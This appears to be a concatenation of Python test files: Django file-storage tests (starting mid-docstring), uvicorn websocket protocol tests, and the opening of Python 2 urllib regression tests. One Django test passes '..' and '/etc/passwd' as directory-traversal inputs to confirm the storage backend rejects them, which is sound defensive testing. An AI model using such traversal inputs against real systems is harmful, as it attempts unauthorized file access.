Makes sure an exception is raised if the location is empty
"""
storage = self.storage_class(location='')
self.assertEqual(storage.base_location, '')
self.assertEqual(storage.location, upath(os.getcwd()))
def test_file_access_options(self):
"""
Standard file access options are available, and work as expected.
"""
self.assertFalse(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'w')
f.write('storage contents')
f.close()
self.assertTrue(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'r')
self.assertEqual(f.read(), 'storage contents')
f.close()
self.storage.delete('storage_test')
self.assertFalse(self.storage.exists('storage_test'))
def test_file_accessed_time(self):
"""
File storage returns a Datetime object for the last accessed time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
atime = self.storage.accessed_time(f_name)
self.assertEqual(atime, datetime.fromtimestamp(
os.path.getatime(self.storage.path(f_name))))
self.assertTrue(datetime.now() - self.storage.accessed_time(f_name) < timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_created_time(self):
"""
File storage returns a Datetime object for the creation time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
ctime = self.storage.created_time(f_name)
self.assertEqual(ctime, datetime.fromtimestamp(
os.path.getctime(self.storage.path(f_name))))
self.assertTrue(datetime.now() - self.storage.created_time(f_name) < timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_modified_time(self):
"""
File storage returns a Datetime object for the last modified time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
mtime = self.storage.modified_time(f_name)
self.assertEqual(mtime, datetime.fromtimestamp(
os.path.getmtime(self.storage.path(f_name))))
self.assertTrue(datetime.now() - self.storage.modified_time(f_name) < timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_save_without_name(self):
"""
File storage extracts the filename from the content object if no
name is given explicitly.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f.name = 'test.file'
storage_f_name = self.storage.save(None, f)
self.assertEqual(storage_f_name, f.name)
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, f.name)))
self.storage.delete(storage_f_name)
def test_file_save_with_path(self):
"""
Saving a pathname should create intermediate directories as necessary.
"""
self.assertFalse(self.storage.exists('path/to'))
self.storage.save('path/to/test.file',
ContentFile('file saved with path'))
self.assertTrue(self.storage.exists('path/to'))
with self.storage.open('path/to/test.file') as f:
self.assertEqual(f.read(), b'file saved with path')
self.assertTrue(os.path.exists(
os.path.join(self.temp_dir, 'path', 'to', 'test.file')))
self.storage.delete('path/to/test.file')
def test_file_path(self):
"""
File storage returns the full path of a file
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.assertEqual(self.storage.path(f_name),
os.path.join(self.temp_dir, f_name))
self.storage.delete(f_name)
def test_file_url(self):
"""
File storage returns a url to access a given file from the Web.
"""
self.assertEqual(self.storage.url('test.file'),
'%s%s' % (self.storage.base_url, 'test.file'))
# should encode special chars except ~!*()'
# like encodeURIComponent() JavaScript function do
self.assertEqual(self.storage.url(r"""~!*()'@#$%^&*abc`+ =.file"""),
"""/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file""")
# should stanslate os path separator(s) to the url path separator
self.assertEqual(self.storage.url("""a/b\\c.file"""),
"""/test_media_url/a/b/c.file""")
self.storage.base_url = None
self.assertRaises(ValueError, self.storage.url, 'test.file')
# #22717: missing ending slash in base_url should be auto-corrected
storage = self.storage_class(location=self.temp_dir,
base_url='/no_ending_slash')
self.assertEqual(
storage.url('test.file'),
'%s%s' % (storage.base_url, 'test.file')
)
def test_listdir(self):
"""
File storage returns a tuple containing directories and files.
"""
self.assertFalse(self.storage.exists('storage_test_1'))
self.assertFalse(self.storage.exists('storage_test_2'))
self.assertFalse(self.storage.exists('storage_dir_1'))
self.storage.save('storage_test_1', ContentFile('custom content'))
self.storage.save('storage_test_2', ContentFile('custom content'))
os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))
dirs, files = self.storage.listdir('')
self.assertEqual(set(dirs), set(['storage_dir_1']))
self.assertEqual(set(files),
set(['storage_test_1', 'storage_test_2']))
self.storage.delete('storage_test_1')
self.storage.delete('storage_test_2')
os.rmdir(os.path.join(self.temp_dir, 'storage_dir_1'))
def test_file_storage_prevents_directory_traversal(self):
"""
File storage prevents directory traversal (files can only be accessed if
they're below the storage location).
"""
self.assertRaises(SuspiciousOperation, self.storage.exists, '..')
self.assertRaises(SuspiciousOperation, self.storage.exists, '/etc/passwd')
def test_file_storage_preserves_filename_case(self):
"""The storage backend should preserve case of filenames."""
# Create a storage backend associated with the mixed case name
# directory.
other_temp_storage = self.storage_class(location=self.temp_dir2)
# Ask that storage backend to store a file with a mixed case filename.
mixed_case = 'CaSe_SeNsItIvE'
file = other_temp_storage.open(mixed_case, 'w')
file.write('storage contents')
file.close()
self.assertEqual(os.path.join(self.temp_dir2, mixed_case),
other_temp_storage.path(mixed_case))
other_temp_storage.delete(mixed_case)
def test_makedirs_race_handling(self):
"""
File storage should be robust against directory creation race conditions.
"""
real_makedirs = os.makedirs
# Monkey-patch os.makedirs, to simulate a normal call, a raced call,
# and an error.
def fake_makedirs(path):
if path == os.path.join(self.temp_dir, 'normal'):
real_makedirs(path)
elif path == os.path.join(self.temp_dir, 'raced'):
real_makedirs(path)
raise OSError(errno.EEXIST, 'simulated EEXIST')
elif path == os.path.join(self.temp_dir, 'error'):
raise OSError(errno.EACCES, 'simulated EACCES')
else:
self.fail('unexpected argument %r' % path)
try:
os.makedirs = fake_makedirs
self.storage.save('normal/test.file',
ContentFile('saved normally'))
with self.storage.open('normal/test.file') as f:
self.assertEqual(f.read(), b'saved normally')
self.storage.save('raced/test.file',
ContentFile('saved with race'))
with self.storage.open('raced/test.file') as f:
self.assertEqual(f.read(), b'saved with race')
# Check that OSErrors aside from EEXIST are still raised.
self.assertRaises(OSError,
self.storage.save, 'error/test.file', ContentFile('not saved'))
finally:
os.makedirs = real_makedirs
def test_remove_race_handling(self):
"""
File storage should be robust against file removal race conditions.
"""
real_remove = os.remove
# Monkey-patch os.remove, to simulate a normal call, a raced call,
# and an error.
def fake_remove(path):
if path == os.path.join(self.temp_dir, 'normal.file'):
real_remove(path)
elif path == os.path.join(self.temp_dir, 'raced.file'):
real_remove(path)
raise OSError(errno.ENOENT, 'simulated ENOENT')
elif path == os.path.join(self.temp_dir, 'error.file'):
raise OSError(errno.EACCES, 'simulated EACCES')
else:
self.fail('unexpected argument %r' % path)
try:
os.remove = fake_remove
self.storage.save('normal.file', ContentFile('delete normally'))
self.storage.delete('normal.file')
self.assertFalse(self.storage.exists('normal.file'))
self.storage.save('raced.file', ContentFile('delete with race'))
self.storage.delete('raced.file')
self.assertFalse(self.storage.exists('normal.file'))
# Check that OSErrors aside from ENOENT are still raised.
self.storage.save('error.file', ContentFile('delete with error'))
self.assertRaises(OSError, self.storage.delete, 'error.file')
finally:
os.remove = real_remove
def test_file_chunks_error(self):
"""
Test behavior when file.chunks() is raising an error
"""
f1 = ContentFile('chunks fails')
def failing_chunks():
raise IOError
f1.chunks = failing_chunks
with self.assertRaises(IOError):
self.storage.save('error.file', f1)
def test_delete_no_name(self):
"""
Calling delete with an empty name should not try to remove the base
storage directory, but fail loudly (#20660).
"""
with self.assertRaises(AssertionError):
self.storage.delete('')
class CustomStorage(FileSystemStorage):
def get_available_name(self, name):
"""
Append numbers to duplicate files rather than underscores, like Trac.
"""
parts = name.split('.')
basename, ext = parts[0], parts[1:]
number = 2
while self.exists(name):
name = '.'.join([basename, str(number)] + ext)
number += 1
return name
class CustomStorageTests(FileStorageTests):
storage_class = CustomStorage
def test_custom_get_available_name(self):
first = self.storage.save('custom_storage', ContentFile('custom contents'))
self.assertEqual(first, 'custom_storage')
second = self.storage.save('custom_storage', ContentFile('more contents'))
self.assertEqual(second, 'custom_storage.2')
self.storage.delete(first)
self.storage.delete(second)
class FileFieldStorageTests(unittest.TestCase):
def tearDown(self):
shutil.rmtree(temp_storage_location)
def test_files(self):
# Attempting to access a FileField from the class raises a descriptive
# error
self.assertRaises(AttributeError, lambda: Storage.normal)
# An object without a file has limited functionality.
obj1 = Storage()
self.assertEqual(obj1.normal.name, "")
self.assertRaises(ValueError, lambda: obj1.normal.size)
# Saving a file enables full functionality.
obj1.normal.save("django_test.txt", ContentFile("content"))
self.assertEqual(obj1.normal.name, "tests/django_test.txt")
self.assertEqual(obj1.normal.size, 7)
self.assertEqual(obj1.normal.read(), b"content")
obj1.normal.close()
# File objects can be assigned to FileField attributes, but shouldn't
# get committed until the model it's attached to is saved.
obj1.normal = SimpleUploadedFile("assignment.txt", b"content")
dirs, files = temp_storage.listdir("tests")
self.assertEqual(dirs, [])
self.assertFalse("assignment.txt" in files)
obj1.save()
dirs, files = temp_storage.listdir("tests")
self.assertEqual(sorted(files), ["assignment.txt", "django_test.txt"])
# Save another file with the same name.
obj2 = Storage()
obj2.normal.save("django_test.txt", ContentFile("more content"))
self.assertEqual(obj2.normal.name, "tests/django_test_1.txt")
self.assertEqual(obj2.normal.size, 12)
obj2.normal.close()
# Deleting an object does not delete the file it uses.
obj2.delete()
obj2.normal.save("django_test.txt", ContentFile("more content"))
self.assertEqual(obj2.normal.name, "tests/django_test_2.txt")
obj2.normal.close()
def test_filefield_read(self):
# Files can be read in a little at a time, if necessary.
obj = Storage.objects.create(
normal=SimpleUploadedFile("assignment.txt", b"content"))
obj.normal.open()
self.assertEqual(obj.normal.read(3), b"con")
self.assertEqual(obj.normal.read(), b"tent")
self.assertEqual(list(obj.normal.chunks(chunk_size=2)), [b"co", b"nt", b"en", b"t"])
obj.normal.close()
def test_file_numbering(self):
# Multiple files with the same name get _N appended to them.
objs = [Storage() for i in range(3)]
for o in objs:
o.normal.save("multiple_files.txt", ContentFile("Same Content"))
self.assertEqual(
[o.normal.name for o in objs],
["tests/multiple_files.txt", "tests/multiple_files_1.txt", "tests/multiple_files_2.txt"]
)
for o in objs:
o.delete()
def test_filefield_default(self):
# Default values allow an object to access a single file.
temp_storage.save('tests/default.txt', ContentFile('default content'))
obj = Storage.objects.create()
self.assertEqual(obj.default.name, "tests/default.txt")
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
# But it shouldn't be deleted, even if there are no more objects using
# it.
obj.delete()
obj = Storage()
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
def test_empty_upload_to(self):
# upload_to can be empty, meaning it does not use subdirectory.
obj = Storage()
obj.empty.save('django_test.txt', ContentFile('more content'))
self.assertEqual(obj.empty.name, "./django_test.txt")
self.assertEqual(obj.empty.read(), b"more content")
obj.empty.close()
def test_random_upload_to(self):
# Verify the fix for #5655, making sure the directory is only
# determined once.
obj = Storage()
obj.random.save("random_file", ContentFile("random content"))
self.assertTrue(obj.random.name.endswith("/random_file"))
obj.random.close()
def test_filefield_pickling(self):
# Push an object into the cache to make sure it pickles properly
obj = Storage()
obj.normal.save("django_test.txt", ContentFile("more content"))
obj.normal.close()
cache.set("obj", obj)
self.assertEqual(cache.get("obj").normal.name, "tests/django_test.txt")
def test_file_object(self):
# Create sample file
temp_storage.save('tests/example.txt', ContentFile('some content'))
# Load it as python file object
with open(temp_storage.path('tests/example.txt')) as file_obj:
# Save it using storage and read its content
temp_storage.save('tests/file_obj', file_obj)
self.assertTrue(temp_storage.exists('tests/file_obj'))
with temp_storage.open('tests/file_obj') as f:
self.assertEqual(f.read(), b'some content')
def test_stringio(self):
# Test passing StringIO instance as content argument to save
output = six.StringIO()
output.write('content')
output.seek(0)
# Save it and read written file
temp_storage.save('tests/stringio', output)
self.assertTrue(temp_storage.exists('tests/stringio'))
with temp_storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
def chunks(self):
time.sleep(1)
return super(ContentFile, self).chunks()
class FileSaveRaceConditionTest(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
self.thread = threading.Thread(target=self.save_file, args=['conflict'])
def tearDown(self):
shutil.rmtree(self.storage_dir)
def save_file(self, name):
name = self.storage.save(name, SlowFile(b"Data"))
def test_race_condition(self):
self.thread.start()
self.save_file('conflict')
self.thread.join()
self.assertTrue(self.storage.exists('conflict'))
self.assertTrue(self.storage.exists('conflict_1'))
self.storage.delete('conflict')
self.storage.delete('conflict_1')
@unittest.skipIf(sys.platform.startswith('win'), "Windows only partially supports umasks and chmod.")
class FileStoragePermissions(unittest.TestCase):
def setUp(self):
self.umask = 0o027
self.old_umask = os.umask(self.umask)
self.storage_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.storage_dir)
os.umask(self.old_umask)
@override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
def test_file_upload_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_file", ContentFile("data"))
actual_mode = os.stat(self.storage.path(name))[0] & 0o777
self.assertEqual(actual_mode, 0o654)
@override_settings(FILE_UPLOAD_PERMISSIONS=None)
def test_file_upload_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
fname = self.storage.save("some_file", ContentFile("data"))
mode = os.stat(self.storage.path(fname))[0] & 0o777
self.assertEqual(mode, 0o666 & ~self.umask)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o765)
def test_file_upload_directory_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/the_file", ContentFile("data"))
dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
self.assertEqual(dir_mode, 0o765)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=None)
def test_file_upload_directory_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/the_file", ContentFile("data"))
dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
self.assertEqual(dir_mode, 0o777 & ~self.umask)
class FileStoragePathParsing(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_directory_with_dot(self):
"""Regression test for #9610.
If the directory name contains a dot and the file name doesn't, make
sure we still mangle the file name instead of the directory name.
"""
self.storage.save('dotted.path/test', ContentFile("1"))
self.storage.save('dotted.path/test', ContentFile("2"))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertTrue(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/test')))
self.assertTrue(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/test_1')))
def test_first_character_dot(self):
"""
File names with a dot as their first character don't have an extension,
and the underscore should get added to the end.
"""
self.storage.save('dotted.path/.test', ContentFile("1"))
self.storage.save('dotted.path/.test', ContentFile("2"))
self.assertTrue(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/.test')))
self.assertTrue(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/.test_1')))
class ContentFileStorageTestCase(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_content_saving(self):
"""
Test that ContentFile can be saved correctly with the filesystem storage,
both if it was initialized with string or unicode content"""
self.storage.save('bytes.txt', ContentFile(b"content"))
self.storage.save('unicode.txt', ContentFile("español"))
@override_settings(ROOT_URLCONF='file_storage.urls')
class FileLikeObjectTestCase(LiveServerTestCase):
"""
Test file-like objects (#15644).
"""
available_apps = []
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(location=self.temp_dir)
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_urllib2_urlopen(self):
"""
Test the File storage API with a file like object coming from urllib2.urlopen()
"""
file_like_object = urlopen(self.live_server_url + '/')
f = File(file_like_object)
stored_filename = self.storage.save("remote_file.html", f)
remote_file = urlopen(self.live_server_url + '/')
with self.storage.open(stored_filename) as stored_file:
self.assertEqual(stored_file.read(), remote_file.read())
|
test_websocket.py | from uvicorn.protocols.http.h11_impl import H11Protocol
from uvicorn.protocols.websockets.websockets_impl import WebSocketProtocol
from uvicorn.protocols.websockets.wsproto_impl import WSProtocol
import asyncio
import functools
import time
import threading
import requests
import pytest
import websockets
from contextlib import contextmanager
class WebSocketResponse:
def __init__(self, scope):
self.scope = scope
async def __call__(self, receive, send):
self.send = send
while True:
message = await receive()
message_type = message["type"].replace(".", "_")
handler = getattr(self, message_type, None)
if handler is not None:
await handler(message)
if message_type == 'websocket_disconnect':
break
def run_loop(loop):
loop.run_forever()
loop.close()
@contextmanager
def run_server(app, protocol_cls):
tasks = set()
asyncio.set_event_loop(None)
loop = asyncio.new_event_loop()
protocol = functools.partial(H11Protocol, app=app, loop=loop, tasks=tasks, ws_protocol_class=protocol_cls)
create_server_task = loop.create_server(protocol, host="127.0.0.1")
server = loop.run_until_complete(create_server_task)
url = "ws://127.0.0.1:%d/" % server.sockets[0].getsockname()[1]
try:
# Run the event loop in a new thread.
thread = threading.Thread(target=run_loop, args=[loop])
thread.start()
# Return the contextmanager state.
yield url
finally:
# Close the loop from our main thread.
while tasks:
time.sleep(0.01)
loop.call_soon_threadsafe(loop.stop)
thread.join()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_invalid_upgrade(protocol_cls):
app = lambda scope: None
with run_server(app, protocol_cls=protocol_cls) as url:
url = url.replace("ws://", "http://")
response = requests.get(
url, headers={"upgrade": "websocket", "connection": "upgrade"}, timeout=5
)
assert response.status_code == 400
assert response.text in [
'Missing Sec-WebSocket-Key header\n',
'Missing Sec-WebSocket-Version header', # websockets
'Missing or empty Sec-WebSocket-Key header\n' # wsproto
]
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_accept_connection(protocol_cls):
class App(WebSocketResponse):
async def websocket_connect(self, message):
await self.send({"type": "websocket.accept"})
async def open_connection(url):
async with websockets.connect(url) as websocket:
return websocket.open
with run_server(App, protocol_cls=protocol_cls) as url:
loop = asyncio.new_event_loop()
is_open = loop.run_until_complete(open_connection(url))
assert is_open
loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_close_connection(protocol_cls):
class App(WebSocketResponse):
async def websocket_connect(self, message):
await self.send({"type": "websocket.close"})
async def open_connection(url):
try:
await websockets.connect(url)
except websockets.exceptions.InvalidHandshake:
return False
return True
with run_server(App, protocol_cls=protocol_cls) as url:
loop = asyncio.new_event_loop()
is_open = loop.run_until_complete(open_connection(url))
assert not is_open
loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_send_text_data_to_client(protocol_cls):
class App(WebSocketResponse):
async def websocket_connect(self, message):
await self.send({"type": "websocket.accept"})
await self.send({"type": "websocket.send", "text": "123"})
async def get_data(url):
async with websockets.connect(url) as websocket:
return await websocket.recv()
with run_server(App, protocol_cls=protocol_cls) as url:
loop = asyncio.new_event_loop()
data = loop.run_until_complete(get_data(url))
assert data == "123"
loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_send_binary_data_to_client(protocol_cls):
class App(WebSocketResponse):
async def websocket_connect(self, message):
await self.send({"type": "websocket.accept"})
await self.send({"type": "websocket.send", "bytes": b"123"})
async def get_data(url):
async with websockets.connect(url) as websocket:
return await websocket.recv()
with run_server(App, protocol_cls=protocol_cls) as url:
loop = asyncio.new_event_loop()
data = loop.run_until_complete(get_data(url))
assert data == b"123"
loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_send_and_close_connection(protocol_cls):
class App(WebSocketResponse):
async def websocket_connect(self, message):
await self.send({"type": "websocket.accept"})
await self.send({"type": "websocket.send", "text": "123"})
await self.send({"type": "websocket.close"})
async def get_data(url):
async with websockets.connect(url) as websocket:
data = await websocket.recv()
is_open = True
try:
await websocket.recv()
except:
is_open = False
return (data, is_open)
with run_server(App, protocol_cls=protocol_cls) as url:
loop = asyncio.new_event_loop()
(data, is_open) = loop.run_until_complete(get_data(url))
assert data == "123"
assert not is_open
loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_send_text_data_to_server(protocol_cls):
class App(WebSocketResponse):
async def websocket_connect(self, message):
await self.send({"type": "websocket.accept"})
async def websocket_receive(self, message):
_text = message.get("text")
await self.send({"type": "websocket.send", "text": _text})
async def send_text(url):
async with websockets.connect(url) as websocket:
await websocket.send("abc")
return await websocket.recv()
with run_server(App, protocol_cls=protocol_cls) as url:
loop = asyncio.new_event_loop()
data = loop.run_until_complete(send_text(url))
assert data == "abc"
loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_send_binary_data_to_server(protocol_cls):
class App(WebSocketResponse):
async def websocket_connect(self, message):
await self.send({"type": "websocket.accept"})
async def websocket_receive(self, message):
_bytes = message.get("bytes")
await self.send({"type": "websocket.send", "bytes": _bytes})
async def send_text(url):
async with websockets.connect(url) as websocket:
await websocket.send(b"abc")
return await websocket.recv()
with run_server(App, protocol_cls=protocol_cls) as url:
loop = asyncio.new_event_loop()
data = loop.run_until_complete(send_text(url))
assert data == b"abc"
loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_send_after_protocol_close(protocol_cls):
class App(WebSocketResponse):
async def websocket_connect(self, message):
await self.send({"type": "websocket.accept"})
await self.send({"type": "websocket.send", "text": "123"})
await self.send({"type": "websocket.close"})
with pytest.raises(Exception):
await self.send({"type": "websocket.send", "text": "123"})
async def get_data(url):
async with websockets.connect(url) as websocket:
data = await websocket.recv()
is_open = True
try:
await websocket.recv()
except:
is_open = False
return (data, is_open)
with run_server(App, protocol_cls=protocol_cls) as url:
loop = asyncio.new_event_loop()
(data, is_open) = loop.run_until_complete(get_data(url))
assert data == "123"
assert not is_open
loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_missing_handshake(protocol_cls):
class App:
def __init__(self, scope):
pass
async def __call__(self, receive, send):
pass
async def connect(url):
await websockets.connect(url)
with run_server(App, protocol_cls=protocol_cls) as url:
loop = asyncio.new_event_loop()
with pytest.raises(websockets.exceptions.InvalidStatusCode) as exc:
loop.run_until_complete(connect(url))
assert exc.value.status_code == 500
loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_send_before_handshake(protocol_cls):
class App:
def __init__(self, scope):
pass
async def __call__(self, receive, send):
await send({"type": "websocket.send", "text": "123"})
async def connect(url):
await websockets.connect(url)
with run_server(App, protocol_cls=protocol_cls) as url:
loop = asyncio.new_event_loop()
with pytest.raises(websockets.exceptions.InvalidStatusCode) as exc:
loop.run_until_complete(connect(url))
assert exc.value.status_code == 500
loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_duplicate_handshake(protocol_cls):
class App:
def __init__(self, scope):
pass
async def __call__(self, receive, send):
await send({"type": "websocket.accept"})
await send({"type": "websocket.accept"})
async def connect(url):
async with websockets.connect(url) as websocket:
data = await websocket.recv()
with run_server(App, protocol_cls=protocol_cls) as url:
loop = asyncio.new_event_loop()
with pytest.raises(websockets.exceptions.ConnectionClosed) as exc:
loop.run_until_complete(connect(url))
assert exc.value.code == 1006
loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_asgi_return_value(protocol_cls):
"""
The ASGI callable should return 'None'. If it doesn't make sure that
the connection is closed with an error condition.
"""
class App:
def __init__(self, scope):
pass
async def __call__(self, receive, send):
await send({"type": "websocket.accept"})
return 123
async def connect(url):
async with websockets.connect(url) as websocket:
data = await websocket.recv()
with run_server(App, protocol_cls=protocol_cls) as url:
loop = asyncio.new_event_loop()
with pytest.raises(websockets.exceptions.ConnectionClosed) as exc:
loop.run_until_complete(connect(url))
assert exc.value.code == 1006
loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_app_close(protocol_cls):
class App:
def __init__(self, scope):
pass
async def __call__(self, receive, send):
while True:
message = await receive()
if message['type'] == 'websocket.connect':
await send({"type": "websocket.accept"})
elif message['type'] == 'websocket.receive':
await send({"type": "websocket.close"})
elif message['type'] == 'websocket.disconnect':
break
async def websocket_session(url):
async with websockets.connect(url) as websocket:
await websocket.ping()
await websocket.send('abc')
await websocket.recv()
with run_server(App, protocol_cls=protocol_cls) as url:
loop = asyncio.new_event_loop()
with pytest.raises(websockets.exceptions.ConnectionClosed) as exc:
loop.run_until_complete(websocket_session(url))
assert exc.value.code == 1000
loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_client_close(protocol_cls):
class App:
def __init__(self, scope):
pass
async def __call__(self, receive, send):
while True:
message = await receive()
if message['type'] == 'websocket.connect':
await send({"type": "websocket.accept"})
elif message['type'] == 'websocket.receive':
pass
elif message['type'] == 'websocket.disconnect':
break
async def websocket_session(url):
async with websockets.connect(url) as websocket:
await websocket.ping()
await websocket.send('abc')
with run_server(App, protocol_cls=protocol_cls) as url:
loop = asyncio.new_event_loop()
loop.run_until_complete(websocket_session(url))
loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
@pytest.mark.parametrize("subprotocol", ["proto1", "proto2"])
def test_subprotocols(protocol_cls, subprotocol):
class App(WebSocketResponse):
async def websocket_connect(self, message):
await self.send({"type": "websocket.accept", "subprotocol": subprotocol})
async def get_subprotocol(url):
async with websockets.connect(
url, subprotocols=["proto1", "proto2"]
) as websocket:
return websocket.subprotocol
with run_server(App, protocol_cls=protocol_cls) as url:
loop = asyncio.new_event_loop()
accepted_subprotocol = loop.run_until_complete(get_subprotocol(url))
assert accepted_subprotocol == subprotocol
loop.close()
|
test_urllib.py | """Regresssion tests for urllib"""
import urllib
import httplib
import unittest
from test import test_support
import os
import mimetools
import tempfile
import StringIO
def hexescape(char):
"""Escape char as RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
if len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
return "%" + hex_repr
class urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test as much functionality as possible so as to cut down on reliance
on connecting to the Net for testing.
"""
def setUp(self):
"""Setup of a temp file to use for testing"""
self.text = "test_urllib: %s\n" % self.__class__.__name__
FILE = file(test_support.TESTFN, 'wb')
try:
FILE.write(self.text)
finally:
FILE.close()
self.pathname = test_support.TESTFN
self.returned_obj = urllib.urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(test_support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "getcode", "__iter__"):
self.assert_(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual('', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" return an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assert_(isinstance(file_num, int),
"fileno() did not return an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did not return the expected text")
def test_close(self):
# Test close() by calling it hear and then having it be called again
# by the tearDown() method for the test
self.returned_obj.close()
def test_info(self):
self.assert_(isinstance(self.returned_obj.info(), mimetools.Message))
def test_geturl(self):
self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_getcode(self):
self.assertEqual(self.returned_obj.getcode(), None)
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line from the
# comparison
for line in self.returned_obj.__iter__():
self.assertEqual(line, self.text)
class ProxyTests(unittest.TestCase):
def setUp(self):
# Records changes to env vars
self.env = test_support.EnvironmentVarGuard()
# Delete all proxy related env vars
for k, v in os.environ.iteritems():
if 'proxy' in k.lower():
self.env.unset(k)
def tearDown(self):
# Restore all proxy related env vars
self.env.__exit__()
del self.env
def test_getproxies_environment_keep_no_proxies(self):
self.env.set('NO_PROXY', 'localhost')
proxies = urllib.getproxies_environment()
# getproxies_environment use lowered case truncated (no '_proxy') keys
self.assertEquals('localhost', proxies['no'])
class urlopen_HttpTests(unittest.TestCase):
"""Test urlopen() opening a fake http connection."""
def fakehttp(self, fakedata):
class FakeSocket(StringIO.StringIO):
def sendall(self, str): pass
def makefile(self, mode, name): return self
def read(self, amt=None):
if self.closed: return ''
return StringIO.StringIO.read(self, amt)
def readline(self, length=None):
if self.closed: return ''
return StringIO.StringIO.readline(self, length)
class FakeHTTPConnection(httplib.HTTPConnection):
def connect(self):
self.sock = FakeSocket(fakedata)
assert httplib.HTTP._connection_class == httplib.HTTPConnection
httplib.HTTP._connection_class = FakeHTTPConnection
def unfakehttp(self):
httplib.HTTP._connection_class = httplib.HTTPConnection
def test_read(self):
self.fakehttp('Hello!')
try:
fp = urllib.urlopen("http://python.org/")
self.assertEqual(fp.readline(), 'Hello!')
self.assertEqual(fp.readline(), '')
self.assertEqual(fp.geturl(), 'http://python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
